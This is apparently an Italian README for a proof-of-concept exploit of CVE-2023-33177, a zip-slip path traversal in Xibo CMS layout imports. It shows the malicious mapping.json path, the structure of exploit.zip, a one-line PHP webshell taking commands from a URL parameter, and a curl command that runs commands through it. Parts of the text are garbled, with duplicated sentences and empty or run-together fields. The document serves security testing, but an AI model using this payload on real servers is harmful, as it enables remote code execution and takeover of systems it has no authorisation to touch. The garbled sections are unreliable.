
Questo exploit dimostra una **vulnerabilità di path traversal** in Xibo CMS (CVE-2023-33177) che consente l'esecuzione remota di codice tramite importazioni di layout malintenzionati.
Questo exploit dimostra una vulnerabilità di path traversal in Xibo CMS (CVE-2023-33177) che consente l'esecuzione remota di codice tramite importazioni di layout malevoli.
CVE/Advisory: CVE-2023-33177 Versioni affette:
Tipo di vulnerabilità: Path Traversal (Zip Slip) Impatto: Remote Code Execution (RCE)
Xibo CMS consente agli utenti autenticati di importare file di layout tramite archivi ZIP. La funzionalità di importazione non convalida correttamente i percorsi dei file nel file mapping.json, permettendo a un attaccante di scrivere file al di fuori della directory della libreria utilizzando sequenze di path traversal (../../).
mapping.json../../web/shell.phplibrary/../../web/shell.php/var/www/cms/web/shell.phpZip contiene: library/../../web/shell.php
Xibo legge: library/ + ../../web/shell.php (da mapping.json)
Xibo scrive: /var/www/cms/library/temp/ + ../../web/shell.php
Risultato: /var/www/cms/web/shell.php ← Webshell nella root web!
python3 create_exploit.py
Questo crea exploit.zip contenente il pacchetto di layout malevolo.
xibo_admin / password)exploit.zipcurl 'http://localhost:8080/shell.php?cmd=id'
Lo ZIP dell'exploit contiene:
exploit.zip
├── layout.json # Definizione valida del layout Xibo
├── playlist.json # Playlist vuota (innesca l'importazione JSON)
├── mapping.json # Contiene il payload di path traversal
└── library/
└── ../../web/
└── shell.php # Webshell PHP (viene estratta nella root web)
La webshell incorporata è minimalista:
<?php system($_GET["cmd"]); ?>
Accessibile tramite: http://<target>/shell.php?cmd=<comando>
Versioni corrette:
Strategie di mitigazione:
.. o percorsi assolutiQuesto exploit è fornito per:
Non utilizzare questo exploit contro sistemi di cui non possiedi o non hai esplicita autorizzazione a testare.
complexusprada Novembre 2025